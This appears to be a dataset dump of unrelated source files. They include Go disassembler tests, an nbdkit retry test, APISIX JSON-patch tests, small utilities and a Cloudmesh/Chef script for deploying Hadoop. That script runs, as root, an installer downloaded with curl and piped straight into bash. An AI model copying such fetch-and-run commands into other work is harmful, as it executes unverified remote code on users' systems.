text stringlengths 1 1.05M |
|---|
import { JupWhereOperator, PropertyTypeJupValues, IJupWhereNode } from "./jup.models";
export function createFilter(operator: JupWhereOperator, column: string, value: PropertyTypeJupValues): IJupWhereNode {
return { operator, column, value };
}
|
package disasm
import (
"reflect"
"testing"
)
func TestParseOpcode(t *testing.T) {
modrmTests := []struct {
bs []byte
want *command
}{
// add
{[]byte{0x00, 0x00}, &command{mnem: add, l: 2, d: 0, w: 0}},
{[]byte{0x01, 0x00}, &command{mnem: add, l: 2, d: 0, w: 1}},
{[]byte{0x02, 0x00}, &command{mnem: add, l: 2, d: 1, w: 0}},
{[]byte{0x03, 0x00}, &command{mnem: add, l: 2, d: 1, w: 1}},
{[]byte{0x04, 0x00}, &command{mnem: add, l: 1, d: 0, w: 0}},
{[]byte{0x05, 0x00}, &command{mnem: add, l: 2, d: 0, w: 1}},
{[]byte{0x80, 0x00}, &command{mnem: add, l: 3, s: 0, w: 0}},
{[]byte{0x81, 0x00}, &command{mnem: add, l: 4, s: 0, w: 1}},
{[]byte{0x83, 0x00}, &command{mnem: add, l: 3, s: 1, w: 1}},
// push
{[]byte{0x06, 0x00}, &command{mnem: push, l: 1, reg: es}},
{[]byte{0x0E, 0x00}, &command{mnem: push, l: 1, reg: cs}},
{[]byte{0x16, 0x00}, &command{mnem: push, l: 1, reg: ss}},
{[]byte{0x1E, 0x00}, &command{mnem: push, l: 1, reg: ds}},
{[]byte{0x50, 0x00}, &command{mnem: push, l: 1, reg: ax}},
{[]byte{0x51, 0x00}, &command{mnem: push, l: 1, reg: cx}},
{[]byte{0x52, 0x00}, &command{mnem: push, l: 1, reg: dx}},
{[]byte{0x53, 0x00}, &command{mnem: push, l: 1, reg: bx}},
{[]byte{0x54, 0x00}, &command{mnem: push, l: 1, reg: sp}},
{[]byte{0x55, 0x00}, &command{mnem: push, l: 1, reg: bp}},
{[]byte{0x56, 0x00}, &command{mnem: push, l: 1, reg: si}},
{[]byte{0x57, 0x00}, &command{mnem: push, l: 1, reg: di}},
// pop
{[]byte{0x07, 0x00}, &command{mnem: pop, l: 1, reg: es}},
{[]byte{0x17, 0x00}, &command{mnem: pop, l: 1, reg: ss}},
{[]byte{0x1F, 0x00}, &command{mnem: pop, l: 1, reg: ds}},
{[]byte{0x58, 0x00}, &command{mnem: pop, l: 1, reg: ax}},
{[]byte{0x59, 0x00}, &command{mnem: pop, l: 1, reg: cx}},
{[]byte{0x5A, 0x00}, &command{mnem: pop, l: 1, reg: dx}},
{[]byte{0x5B, 0x00}, &command{mnem: pop, l: 1, reg: bx}},
{[]byte{0x5C, 0x00}, &command{mnem: pop, l: 1, reg: sp}},
{[]byte{0x5D, 0x00}, &command{mnem: pop, l: 1, reg: bp}},
{[]byte{0x5E, 0x00}, &command{mnem: pop, l: 1, reg: si}},
{[]byte{0x5F, 0x00}, &command{mnem: pop, l: 1, reg: di}},
{[]byte{0x8F, 0x00}, &command{mnem: pop, l: 2}},
// or
{[]byte{0x08, 0x00}, &command{mnem: or, l: 2, d: 0, w: 0}},
{[]byte{0x09, 0x00}, &command{mnem: or, l: 2, d: 0, w: 1}},
{[]byte{0x0A, 0x00}, &command{mnem: or, l: 2, d: 1, w: 0}},
{[]byte{0x0B, 0x00}, &command{mnem: or, l: 2, d: 1, w: 1}},
{[]byte{0x0C, 0x00}, &command{mnem: or, l: 1, d: 0, w: 0}},
{[]byte{0x0D, 0x00}, &command{mnem: or, l: 2, d: 0, w: 1}},
{[]byte{0x80, 0x08}, &command{mnem: or, l: 3, s: 0, w: 0}},
{[]byte{0x81, 0x08}, &command{mnem: or, l: 4, s: 0, w: 1}},
{[]byte{0x83, 0x08}, &command{mnem: or, l: 3, s: 1, w: 1}},
// adc
{[]byte{0x10, 0x00}, &command{mnem: adc, l: 2, d: 0, w: 0}},
{[]byte{0x11, 0x00}, &command{mnem: adc, l: 2, d: 0, w: 1}},
{[]byte{0x12, 0x00}, &command{mnem: adc, l: 2, d: 1, w: 0}},
{[]byte{0x13, 0x00}, &command{mnem: adc, l: 2, d: 1, w: 1}},
{[]byte{0x14, 0x00}, &command{mnem: adc, l: 1, d: 0, w: 0}},
{[]byte{0x15, 0x00}, &command{mnem: adc, l: 2, d: 0, w: 1}},
{[]byte{0x80, 0x10}, &command{mnem: adc, l: 3, s: 0, w: 0}},
{[]byte{0x81, 0x10}, &command{mnem: adc, l: 4, s: 0, w: 1}},
{[]byte{0x83, 0x10}, &command{mnem: adc, l: 3, s: 1, w: 1}},
// sbb
{[]byte{0x18, 0x00}, &command{mnem: sbb, l: 2, d: 0, w: 0}},
{[]byte{0x19, 0x00}, &command{mnem: sbb, l: 2, d: 0, w: 1}},
{[]byte{0x1A, 0x00}, &command{mnem: sbb, l: 2, d: 1, w: 0}},
{[]byte{0x1B, 0x00}, &command{mnem: sbb, l: 2, d: 1, w: 1}},
{[]byte{0x1C, 0x00}, &command{mnem: sbb, l: 1, d: 0, w: 0}},
{[]byte{0x1D, 0x00}, &command{mnem: sbb, l: 2, d: 0, w: 1}},
{[]byte{0x80, 0x18}, &command{mnem: sbb, l: 3, s: 0, w: 0}},
{[]byte{0x81, 0x18}, &command{mnem: sbb, l: 4, s: 0, w: 1}},
{[]byte{0x83, 0x18}, &command{mnem: sbb, l: 3, s: 1, w: 1}},
// and
{[]byte{0x20, 0x00}, &command{mnem: and, l: 2, d: 0, w: 0}},
{[]byte{0x21, 0x00}, &command{mnem: and, l: 2, d: 0, w: 1}},
{[]byte{0x22, 0x00}, &command{mnem: and, l: 2, d: 1, w: 0}},
{[]byte{0x23, 0x00}, &command{mnem: and, l: 2, d: 1, w: 1}},
{[]byte{0x24, 0x00}, &command{mnem: and, l: 1, d: 0, w: 0}},
{[]byte{0x25, 0x00}, &command{mnem: and, l: 2, d: 0, w: 1}},
{[]byte{0x80, 0x20}, &command{mnem: and, l: 3, s: 0, w: 0}},
{[]byte{0x81, 0x20}, &command{mnem: and, l: 4, s: 0, w: 1}},
{[]byte{0x83, 0x20}, &command{mnem: and, l: 3, s: 1, w: 1}},
// daa
{[]byte{0x27, 0x00}, &command{mnem: daa, l: 1}},
// sub
{[]byte{0x28, 0x00}, &command{mnem: sub, l: 2, d: 0, w: 0}},
{[]byte{0x29, 0x00}, &command{mnem: sub, l: 2, d: 0, w: 1}},
{[]byte{0x2A, 0x00}, &command{mnem: sub, l: 2, d: 1, w: 0}},
{[]byte{0x2B, 0x00}, &command{mnem: sub, l: 2, d: 1, w: 1}},
{[]byte{0x2C, 0x00}, &command{mnem: sub, l: 1, d: 0, w: 0}},
{[]byte{0x2D, 0x00}, &command{mnem: sub, l: 2, d: 0, w: 1}},
{[]byte{0x80, 0x28}, &command{mnem: sub, l: 3, s: 0, w: 0}},
{[]byte{0x81, 0x28}, &command{mnem: sub, l: 4, s: 0, w: 1}},
{[]byte{0x83, 0x28}, &command{mnem: sub, l: 3, s: 1, w: 1}},
// das
{[]byte{0x2F, 0x00}, &command{mnem: das, l: 1}},
// xor
{[]byte{0x30, 0x00}, &command{mnem: xor, l: 2, d: 0, w: 0}},
{[]byte{0x31, 0x00}, &command{mnem: xor, l: 2, d: 0, w: 1}},
{[]byte{0x32, 0x00}, &command{mnem: xor, l: 2, d: 1, w: 0}},
{[]byte{0x33, 0x00}, &command{mnem: xor, l: 2, d: 1, w: 1}},
{[]byte{0x34, 0x00}, &command{mnem: xor, l: 1, d: 0, w: 0}},
{[]byte{0x35, 0x00}, &command{mnem: xor, l: 2, d: 0, w: 1}},
{[]byte{0x80, 0x30}, &command{mnem: xor, l: 3, s: 0, w: 0}},
{[]byte{0x81, 0x30}, &command{mnem: xor, l: 4, s: 0, w: 1}},
{[]byte{0x83, 0x30}, &command{mnem: xor, l: 3, s: 1, w: 1}},
// aaa
{[]byte{0x37, 0x00}, &command{mnem: aaa, l: 1}},
// cmp
{[]byte{0x38, 0x00}, &command{mnem: cmp, l: 2, d: 0, w: 0}},
{[]byte{0x39, 0x00}, &command{mnem: cmp, l: 2, d: 0, w: 1}},
{[]byte{0x3A, 0x00}, &command{mnem: cmp, l: 2, d: 1, w: 0}},
{[]byte{0x3B, 0x00}, &command{mnem: cmp, l: 2, d: 1, w: 1}},
{[]byte{0x3C, 0x00}, &command{mnem: cmp, l: 1, d: 0, w: 0}},
{[]byte{0x3D, 0x00}, &command{mnem: cmp, l: 2, d: 0, w: 1}},
{[]byte{0x80, 0x38}, &command{mnem: cmp, l: 3, s: 0, w: 0}},
{[]byte{0x81, 0x38}, &command{mnem: cmp, l: 4, s: 0, w: 1}},
{[]byte{0x83, 0x38}, &command{mnem: cmp, l: 3, s: 1, w: 1}},
// aas
{[]byte{0x3F, 0x00}, &command{mnem: aas, l: 1}},
// inc
{[]byte{0x40, 0x00}, &command{mnem: inc, l: 1, reg: ax}},
{[]byte{0x41, 0x00}, &command{mnem: inc, l: 1, reg: cx}},
{[]byte{0x42, 0x00}, &command{mnem: inc, l: 1, reg: dx}},
{[]byte{0x43, 0x00}, &command{mnem: inc, l: 1, reg: bx}},
{[]byte{0x44, 0x00}, &command{mnem: inc, l: 1, reg: sp}},
{[]byte{0x45, 0x00}, &command{mnem: inc, l: 1, reg: bp}},
{[]byte{0x46, 0x00}, &command{mnem: inc, l: 1, reg: si}},
{[]byte{0x47, 0x00}, &command{mnem: inc, l: 1, reg: di}},
// dec
{[]byte{0x48, 0x00}, &command{mnem: dec, l: 1, reg: ax}},
{[]byte{0x49, 0x00}, &command{mnem: dec, l: 1, reg: cx}},
{[]byte{0x4A, 0x00}, &command{mnem: dec, l: 1, reg: dx}},
{[]byte{0x4B, 0x00}, &command{mnem: dec, l: 1, reg: bx}},
{[]byte{0x4C, 0x00}, &command{mnem: dec, l: 1, reg: sp}},
{[]byte{0x4D, 0x00}, &command{mnem: dec, l: 1, reg: bp}},
{[]byte{0x4E, 0x00}, &command{mnem: dec, l: 1, reg: si}},
{[]byte{0x4F, 0x00}, &command{mnem: dec, l: 1, reg: di}},
// test
{[]byte{0x84, 0x00}, &command{mnem: test, l: 2, w: 0}},
{[]byte{0x85, 0x00}, &command{mnem: test, l: 2, w: 1}},
// xchg
{[]byte{0x86, 0x00}, &command{mnem: xchg, l: 2, w: 0}},
{[]byte{0x87, 0x00}, &command{mnem: xchg, l: 2, w: 1}},
{[]byte{0x91, 0x00}, &command{mnem: xchg, l: 1, reg: cx}},
{[]byte{0x92, 0x00}, &command{mnem: xchg, l: 1, reg: dx}},
{[]byte{0x93, 0x00}, &command{mnem: xchg, l: 1, reg: bx}},
{[]byte{0x94, 0x00}, &command{mnem: xchg, l: 1, reg: sp}},
{[]byte{0x95, 0x00}, &command{mnem: xchg, l: 1, reg: bp}},
{[]byte{0x96, 0x00}, &command{mnem: xchg, l: 1, reg: si}},
{[]byte{0x97, 0x00}, &command{mnem: xchg, l: 1, reg: di}},
// mov
{[]byte{0x88, 0x00}, &command{mnem: mov, l: 2, d: 0, w: 0}},
{[]byte{0x89, 0x00}, &command{mnem: mov, l: 2, d: 0, w: 1}},
{[]byte{0x8A, 0x00}, &command{mnem: mov, l: 2, d: 1, w: 0}},
{[]byte{0x8B, 0x00}, &command{mnem: mov, l: 2, d: 1, w: 1}},
{[]byte{0x8C, 0x00}, &command{mnem: mov, l: 2}},
{[]byte{0x8E, 0x00}, &command{mnem: mov, l: 2}},
{[]byte{0xA0, 0x00}, &command{mnem: mov, l: 3, d: 0, w: 0, reg: al}},
{[]byte{0xA1, 0x00}, &command{mnem: mov, l: 3, d: 0, w: 1, reg: ax}},
{[]byte{0xA2, 0x00}, &command{mnem: mov, l: 3, d: 1, w: 0, reg: al}},
{[]byte{0xA3, 0x00}, &command{mnem: mov, l: 3, d: 1, w: 1, reg: ax}},
// lea
{[]byte{0x8D, 0x00}, &command{mnem: lea, l: 2}},
// cbw
{[]byte{0x98, 0x00}, &command{mnem: cbw, l: 1}},
// cwd
{[]byte{0x99, 0x00}, &command{mnem: cwd, l: 1}},
// wait
{[]byte{0x9B, 0x00}, &command{mnem: wait, l: 1}},
// pushf
{[]byte{0x9C, 0x00}, &command{mnem: pushf, l: 1}},
// popf
{[]byte{0x9D, 0x00}, &command{mnem: popf, l: 1}},
// sahf
{[]byte{0x9E, 0x00}, &command{mnem: sahf, l: 1}},
// lahf
{[]byte{0x9F, 0x00}, &command{mnem: lahf, l: 1}},
}
got := &command{}
for _, tt := range modrmTests {
err := got.parseOpcode(tt.bs)
if err != nil {
t.Errorf("%v", err)
}
if !reflect.DeepEqual(got, tt.want) {
t.Errorf("on %X: got %+v; want %+v", tt.bs, got, tt.want)
}
}
}
|
<filename>okhelper/src/main/java/com/release/okhelper/utils/LoggingInterceptor.java
package com.release.okhelper.utils;
import android.util.Log;
import java.io.IOException;
import okhttp3.Interceptor;
import okhttp3.Request;
import okhttp3.Response;
/**
* @author Mr.release
* @create 2019/4/3
* @Describe
*/
public class LoggingInterceptor implements Interceptor {
private static final String TAG = LoggingInterceptor.class.getSimpleName();
@Override
public Response intercept(Chain chain) throws IOException {
Request request = chain.request();
Log.d(TAG, "intercept-request:" + request.url());
Response response = chain.proceed(request);
Log.d(TAG, "intercept-response:" + response.request().url());
return response;
}
}
|
<gh_stars>0
package filters
import (
"sort"
"testing"
"github.com/abesto/easyssh/util"
)
func TestSupportedFilterNames(t *testing.T) {
expectedNames := []string{"coalesce", "first", "external", "ec2-instance-id", "list", "id"}
actualNames := SupportedFilterNames()
sort.Strings(expectedNames)
sort.Strings(actualNames)
if len(expectedNames) != len(actualNames) {
t.Error("len")
}
for i := 0; i < len(expectedNames); i++ {
if expectedNames[i] != actualNames[i] {
t.Error(i, expectedNames[i], actualNames[i], expectedNames, actualNames)
}
}
}
func TestMakeFilterWrongName(t *testing.T) {
util.ExpectPanic(t, "filter \"foo-bar\" is not known", func() {
Make("(list (foo-bar))")
})
}
|
package com.qiwen.leetcode._485;
/**
* 给定一个二进制数组, 计算其中最大连续1的个数。
*
* 示例 1:
*
* 输入: [1,1,0,1,1,1]
* 输出: 3
* 解释: 开头的两位和最后的三位都是连续1,所以最大连续1的个数是 3.
* 注意:
*
* 输入的数组只包含 0 和1。
* 输入数组的长度是正整数,且不超过 10,000。
*
* 来源:力扣(LeetCode)
* 链接:https://leetcode-cn.com/problems/max-consecutive-ones
* 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
*
*
* 执行结果:
* 通过
* 显示详情
* 执行用时:
* 3 ms
* , 在所有 Java 提交中击败了
* 37.71%
* 的用户
* 内存消耗:
* 41.2 MB
* , 在所有 Java 提交中击败了
* 5.26%
* 的用户
*/
public class Problem485 {
public static void main(String[] args){
int[] nums = new int[]{1,1,0,1,1,1,0,1};
Solution solution = new Solution();
int maxConsecutiveOnes = solution.findMaxConsecutiveOnes(nums);
System.out.println(maxConsecutiveOnes);
}
}
|
#!/bin/sh
# This script updates all packages and reboots the system. Intended to be setup on a cron in the middle of the night
main() {
echo "Updating Linux... the system will reboot once complete."
update
}
update() {
sudo apt-get update
sudo apt-get upgrade
sudo reboot
}
main
|
#!/usr/bin/env bash
# nbdkit
# Copyright (C) 2018-2020 Red Hat Inc.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Red Hat nor the names of its contributors may be
# used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY RED HAT AND CONTRIBUTORS ''AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
# PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL RED HAT OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
# USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
# OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
source ./functions.sh
set -e
set -x
fail=0
requires qemu-io --version
requires dd iflag=count_bytes </dev/null
files="retry-size-open-count retry-size-fail"
rm -f $files
cleanup_fn rm -f $files
touch retry-size-open-count
start_t=$SECONDS
# Create a custom plugin which will test retrying.
st=0
nbdkit -v -U - \
sh - \
--filter=retry retry-delay=1 \
--run 'qemu-io -f raw -r $nbd \
-c "r 0 512" -c "r 512 512"' <<'EOF' || st=$?
#!/usr/bin/env bash
case "$1" in
open)
# Count how many times the connection is (re-)opened.
read i < retry-size-open-count
echo $((i+1)) > retry-size-open-count
;;
get_size)
# Temporarily report a smaller size
read i < retry-size-open-count
if [ $i = 2 ]; then
echo 512
else
echo 1024
fi
;;
pread)
# Fail first open unconditionally
# On second open, ensure nbdkit obyes smaller bound
# On third open, allow read to succeed
read i < retry-size-open-count
case $i in
1) echo "EIO too soon to read" >&2
exit 1 ;;
2) if [ $(( $3 + $4 )) -gt 512 ]; then
touch retry-size-fail
fi ;;
esac
dd if=/dev/zero count=$3 iflag=count_bytes
;;
*) exit 2 ;;
esac
EOF
# In this test we should see the following:
# open reports size 1024
# first pread FAILS
# retry and wait 1 seconds
# open reports size 512
# first pread succeeds
# second pread FAILS without calling into pread
# retry and wait 1 seconds
# open reports size 1024
# second pread succeeds
# The minimum time for the test should be 1+1 = 2 seconds.
end_t=$SECONDS
if [ $((end_t - start_t)) -lt 2 ]; then
echo "$0: test ran too quickly"
fail=1
fi
# Check the handle was opened 3 times (first open + reopens).
read open_count < retry-size-open-count
if [ $open_count -ne 3 ]; then
echo "$0: open-count ($open_count) != 3"
fail=1
fi
# Check that nbdkit checked bounds
if [ -e retry-size-fail ]; then
echo "$0: nbdkit read past EOF"
fail=1
fi
exit $fail
|
public void drawLeadingMargin(Canvas c, Paint p, int x) {
Paint.Style style = p.getStyle();
int color = p.getColor();
p.setStyle(Paint.Style.FILL);
p.setColor(lineColor);
c.drawRect(x, 0, x + lineWidth, c.getHeight(), p);
p.setStyle(style);
p.setColor(color);
} |
import { NgModule } from '@angular/core';
import { TrainingComponent } from './training.component';
import { CurrentTrainingComponent } from './current-training/current-training.component';
import { NewTrainingComponent } from './new-training/new-training.component';
import { PastTrainingsComponent } from './past-trainings/past-trainings.component';
import { StopTrainingComponent } from './current-training/stop-training.component';
import { SharedModule } from '../shared/shared.module';
import { TrainingRoutingModule } from './training-routing.module';
import { StoreModule } from '@ngrx/store';
import { trainingReducer } from './training.reducer';
@NgModule({
declarations: [
TrainingComponent,
CurrentTrainingComponent,
NewTrainingComponent,
PastTrainingsComponent,
StopTrainingComponent], // StoreModule.forFeature lazy loads the training module with a reducer
imports: [SharedModule, TrainingRoutingModule, StoreModule.forFeature('training', trainingReducer)],
entryComponents: [StopTrainingComponent]
})
export class TrainingModule {}
|
# Exersie of "Deploying Virtual Cluster with Cloudmesh "
# Try to access a master node of your cluster. (Make a screenshot)
# Create a Virtual Cluster with 2 VMs. (Make a screenshot)
# Submit two screenshots
# Activate india
cm cloud on india
cm cloud select india
cm cloud default india
# default saetting
cm default image --name=futuresystems/ubuntu-14.04
cm default flavor --name=m1.small
# Create 2 virtual cluster
cm cluster create virtual_cluster_ext --count=2 --ln=ubuntu --cloud=india --flavor=m1.small --image=futuresystems/ubuntu-14.04
# In case many debugging message appear
# cm debug off
#/cloudmesh-2.3.0-py2.7.egg/cloudmesh/iaas/openstack/cm_compute.pyc.
# Setp cluster for Hadoop
cm cloud select india
cm cloud on india
cm key default hshioi-ubuntu-vm-key0510
cm label --prefix=test_hshioi --id=1
cm default image --name=futuresystems/ubuntu-14.04
cm default flavor --name=m1.small
# Deploying Hadoop
#Chef
sudo su -
apt-get update
cd /home/ubuntu
curl -L https://www.opscode.com/chef/install.sh | bash
# Chef configration and Cookbooks
wget http://github.com/opscode/chef-repo/tarball/master
tar -zxf master
mv *-chef-repo* chef-repo
rm master
cd chef-repo/
mkdir .chef
echo "cookbook_path [ '/home/ubuntu/chef-repo/cookbooks' ]" > .chef/knife.rb
cd cookbooks
knife cookbook site download java
knife cookbook site download apt
knife cookbook site download yum
knife cookbook site download hadoop
knife cookbook site download ohai
knife cookbook site download sysctl
tar -zxf java*
tar -zxf apt*
tar -zxf yum*
tar -zxf hadoop*
tar -zxf sysctl*
tar -zxf ohai*
rm *.tar.gz
# Customization for JAVA.rb, hadoop.rb,
cd /home/ubuntu/chef-repo/roles
nano java.rb
echo "write the below preference in 'java.r'"
# name "java"
# description "Install Oracle Java"
# default_attributes(
# "java" => {
# "install_flavor" => "oracle",
# "jdk_version" => "6",
# "set_etc_environment" => true,
# "oracle" => {
# "accept_oracle_download_terms" => true
# }
# }
# )
# run_list(
# "recipe[java]"
# )
nano hadoop.rb
# name "hadoop"
# description "set Hadoop attributes"
# default_attributes(
# "hadoop" => {
# "distribution" => "bigtop",
# "core_site" => {
# "fs.defaultFS" => "hdfs://hadoop1"
# },
# "yarn_site" => {
# "yarn.resourcemanager.hostname" => "hadoop1"
# }
# }
# )
# run_list(
# "recipe[hadoop]"
# )
cd /home/ubuntu/chef-repo
nano solo.rb
# file_cache_path "/home/ubuntu/chef-solo"
# cookbook_path "/home/ubuntu/chef-repo/cookbooks"
# role_path "/home/ubuntu/chef-repo/roles"
# verify_api_cert true
|
# ============================================================================
# Copyright (c) 2011-2012 University of Pennsylvania
# Copyright (c) 2013-2014 Andreas Schuh
# All rights reserved.
#
# See COPYING file for license information or visit
# http://opensource.andreasschuh.com/cmake-basis/download.html#license
# ============================================================================
##############################################################################
# @file config.sh
# @brief Defines constants such as the BASH version.
##############################################################################
[ "${_BASIS_CONFIG_INCLUDED}" == 'true' ] || {
_BASIS_CONFIG_INCLUDED='true'
## @addtogroup BasisBashUtilities
# @{
## @brief Major version number of Bash interpreter.
BASH_VERSION_MAJOR=${BASH_VERSION%%.*}
## @brief Minor version number of Bash interpreter.
BASH_VERSION_MINOR=${BASH_VERSION#*.}
BASH_VERSION_MINOR=${BASH_VERSION_MINOR%%.*}
readonly BASH_VERSION_MAJOR
readonly BASH_VERSION_MINOR
## @}
# end of Doxygen group
} # _BASIS_CONFIG_INCLUDED
|
<filename>api/internal/utils/json_patch_test.go<gh_stars>100-1000
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package utils
import (
"bytes"
"encoding/json"
"reflect"
"testing"
)
func compareJSON(a, b string) bool {
var objA, objB interface{}
json.Unmarshal([]byte(a), &objA)
json.Unmarshal([]byte(b), &objB)
return reflect.DeepEqual(objA, objB)
}
func formatJSON(j string) string {
buf := new(bytes.Buffer)
json.Indent(buf, []byte(j), "", " ")
return buf.String()
}
func TestMergeJson(t *testing.T) {
cases := []struct {
doc, patch, result, desc string
}{
{
desc: "simple merge",
doc: `{
"id": "1",
"status": 1,
"key": "fake key",
"cert": "fake cert",
"create_time": 1,
"update_time": 2
}`,
patch: `{
"id": "1",
"status": 0,
"key": "fake key1",
"cert": "fake cert1"
}`,
result: `{
"id": "1",
"status": 0,
"key": "fake key1",
"cert": "fake cert1",
"create_time": 1,
"update_time": 2
}`,
},
{
desc: `array merge`,
doc: `{
"uri": "/index.html",
"upstream": {
"type": "roundrobin",
"nodes": [{
"host": "172.16.58.3",
"port": 80,
"weight" : 1
}]
}
}`,
patch: `{
"upstream": {
"nodes": [{
"host": "172.16.17.32",
"port": 80,
"weight" : 1
},{
"host": "192.168.3.11",
"port": 80,
"weight" : 1
}]
}
}`,
result: `{
"uri": "/index.html",
"upstream": {
"type": "roundrobin",
"nodes": [{
"host": "172.16.17.32",
"port": 80,
"weight" : 1
},{
"host": "192.168.3.11",
"port": 80,
"weight" : 1
}]
}
}`,
},
}
for _, c := range cases {
out, err := MergeJson([]byte(c.doc), []byte(c.patch))
if err != nil {
t.Errorf("Unable to merge patch: %s", err)
}
if !compareJSON(string(out), c.result) {
t.Errorf("Merge failed. Expected:\n%s\n\nActual:\n%s",
formatJSON(c.result), formatJSON(string(out)))
}
}
}
func TestPatchJson(t *testing.T) {
cases := []struct {
doc, path, value, result, desc string
}{
{
desc: "patch array",
doc: `{
"uri": "/index.html",
"upstream": {
"type": "roundrobin",
"nodes": [{
"host": "172.16.58.3",
"port": 80,
"weight" : 1
}]
}
}`,
path: `/upstream/nodes`,
value: `[{
"host": "172.16.17.32",
"port": 80,
"weight" : 1
},{
"host": "192.168.3.11",
"port": 80,
"weight" : 1
}]`,
result: `{
"uri": "/index.html",
"upstream": {
"type": "roundrobin",
"nodes": [{
"host": "172.16.17.32",
"port": 80,
"weight" : 1
},{
"host": "192.168.3.11",
"port": 80,
"weight" : 1
}]
}
}`,
},
{
desc: "patch field that non existent",
doc: `{
"uri": "/index.html",
"upstream": {
"type": "roundrobin",
"nodes": [{
"host": "172.16.58.3",
"port": 80,
"weight" : 1
}]
}
}`,
path: `/upstream/labels`,
value: `{"app": "test"}`,
result: `{
"uri": "/index.html",
"upstream": {
"type": "roundrobin",
"nodes": [{
"host": "172.16.58.3",
"port": 80,
"weight" : 1
}],
"labels": {"app": "test"}
}
}`,
},
}
for _, c := range cases {
out, err := PatchJson([]byte(c.doc), c.path, c.value)
if err != nil {
t.Errorf("Unable to patch: %s", err)
}
if !compareJSON(string(out), c.result) {
t.Errorf("Patch failed. Expected:\n%s\n\nActual:\n%s",
formatJSON(c.result), formatJSON(string(out)))
}
}
}
|
<gh_stars>0
package io.github.brightloong.coding.interview.algorithms.utils; /******************************************************************************
* Compilation: javac StopwatchCPU.java
* Execution: none
* Dependencies: none
*
* A version of Stopwatch.java that measures CPU time on a single
* core or processor (instead of wall clock time).
*
******************************************************************************/
import java.lang.management.ThreadMXBean;
import java.lang.management.ManagementFactory;
/**
* The {@code StopwatchCPU} data type is for measuring
* the CPU time used during a programming task.
*
* See {@link Stopwatch} for a version that measures wall-clock time
* (the real time that elapses).
*
* @author <NAME>
* @author <NAME>
* @author <NAME>
*/
public class StopwatchCPU {
private static final double NANOSECONDS_PER_SECOND = 1000000000;
private final ThreadMXBean threadTimer;
private final long start;
/**
* Initializes a new stopwatch.
*/
public StopwatchCPU() {
threadTimer = ManagementFactory.getThreadMXBean();
start = threadTimer.getCurrentThreadCpuTime();
}
/**
* Returns the elapsed CPU time (in seconds) since the stopwatch was created.
*
* @return elapsed CPU time (in seconds) since the stopwatch was created
*/
public double elapsedTime() {
long now = threadTimer.getCurrentThreadCpuTime();
return (now - start) / NANOSECONDS_PER_SECOND;
}
}
|
#!/bin/bash
cd .meteor/local
## declare an array variable
#declare -a files=("build" "bundler-cache" "cordova-build" "isopacks" "plugin-cache" "shell")
#we do not delete cordova-build/plugins as it is llong to download to speed up build
declare -a files=("build" "bundler-cache" "isopacks" "shell"\
"cordova-build/" \
# "cordova-build/hooks" "cordova-build/platforms" "cordova-build/resources" \
# "cordova-build/www cordova-build/config.xml"
)
#we delete everything but not the local database ".meteor/local/db"
## now loop through the above array
for dir in "${files[@]}"
do
echo "removing" "$dir"
rm -rf $dir
#ls -1 "$dir"
done
|
#!/bin/bash
#
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
test_filter responsive_images,rewrite_images,-inline_images adds srcset for \
Puzzle.jpg and Cuppa.png
fetch_until $URL 'grep -c srcset=' 3
# Make sure all Puzzle URLs are rewritten.
fetch_until -save $URL 'grep -c [^x]Puzzle.jpg' 0
check egrep -q 'xPuzzle.jpg.pagespeed.+srcset="([^ ]*images/([0-9]+x[0-9]+)?xPuzzle.jpg.pagespeed.ic.[0-9a-zA-Z_-]+.jpg [0-9.]+x,?)+"' $FETCH_FILE
# Make sure all Cuppa URLs are rewritten.
fetch_until -save $URL 'grep -c [^x]Cuppa.png' 0
check egrep -q 'xCuppa.png.pagespeed.+srcset="([^ ]*images/([0-9]+x[0-9]+)?xCuppa.png.pagespeed.ic.[0-9a-zA-Z_-]+.png [0-9.]+x,?)+"' $FETCH_FILE
test_filter responsive_images,rewrite_images,+inline_images adds srcset for \
Puzzle.jpg, but not Cuppa.png
# Cuppa.png will be inlined, so we should not get a srcset for it.
fetch_until $URL 'grep -c Cuppa.png' 0 # Make sure Cuppa.png is inlined.
fetch_until $URL 'grep -c srcset=' 2 # And only two srcsets (for Puzzle.jpg).
# Make sure all Puzzle URLs are rewritten.
fetch_until -save $URL 'grep -c [^x]Puzzle.jpg' 0
